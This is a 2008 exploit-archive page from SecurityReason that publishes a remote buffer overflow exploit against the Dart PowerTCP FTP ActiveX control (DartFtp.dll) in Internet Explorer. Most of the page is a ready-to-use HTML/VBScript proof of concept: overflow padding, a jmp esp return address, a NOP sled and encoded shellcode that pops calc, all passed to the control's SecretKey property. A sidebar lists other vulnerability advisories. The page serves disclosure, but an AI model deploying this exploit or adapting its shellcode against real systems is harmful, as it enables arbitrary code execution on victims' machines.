Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research
WLB

WLB Database

Send to WLB

About WLB
RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP
Corporate

Contact

About us
Services

SecurePHP
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : ExploitAlert

  Topic : Dart Communications PowerTCP FTP module Remote BOF Exploit
  ExploitAlert : 4956
  Milw0rm ID : 6793
  Credit : Intel
  Date : 21.10.2008

  Download

  Exploit Code :  

<html>
<pre>
Author: Intel
Discovered by: Intel

Software: PowerTCP ActiveX
Vulnerable Component: DartFtp.dll
Version: 2.0.2.0
Website: www.dart.com
Description:

"PowerTCP tools from Dart Communications are comprehensive tools you can
include in your programs to perform common TCP/IP functions, including FTP,

HTTP, SMTP, POP3, telnet, and SNMP. In addition, Dart supplies a series of

other tools, such as a Zip compressor and a VT320 terminal emulator. This
review, however, will focus only on two tools: the FTP Tool and the Mail
Tool,
which supports SMTP and POP3."

RegKey Safe for Script: False
RegkeySafe for Init: True
KillBitSet: False

Tested on Vista SP1 fully patched and IE7


<object classid='clsid:39FDA070-61BA-11D2-AD84-00105A17B608'
id='pwn'></object>
<input language=VBScript onclick=Launch() type=button value="Launch
Exploit">
<script language = 'vbscript'>
Sub Launch

buff = String (1684, "A")
RET = unescape("%5F%DC%02%10%cc") //jmp esp in DartFtp.DLL, we added
in int3 because without it our nop sled would cause an access violation
nop = String(22, unescape("%90"))


//Exec Calc Scode
shellcode =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" & _

"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" & _

"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" & _

"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" & _

"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" & _

"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" & _

"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" & _

"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" & _

"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" & _

"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" & _

"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" & _

"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" & _

"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" & _

"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" & _

"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" & _

"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" & _

"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" & _

"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" & _

"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" & _

"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" & _

"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" & _

"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" & _

"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" & _
"%4e%31%75%74%38%70%65%77%70%43")


naughtybuffer = buff + ret + nop + shellcode + nop

pwn.SecretKey = naughtybuffer

End Sub
</script>
</html>
Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.
Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability
PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass
Copyright © SecurityReason. All Rights Reserved.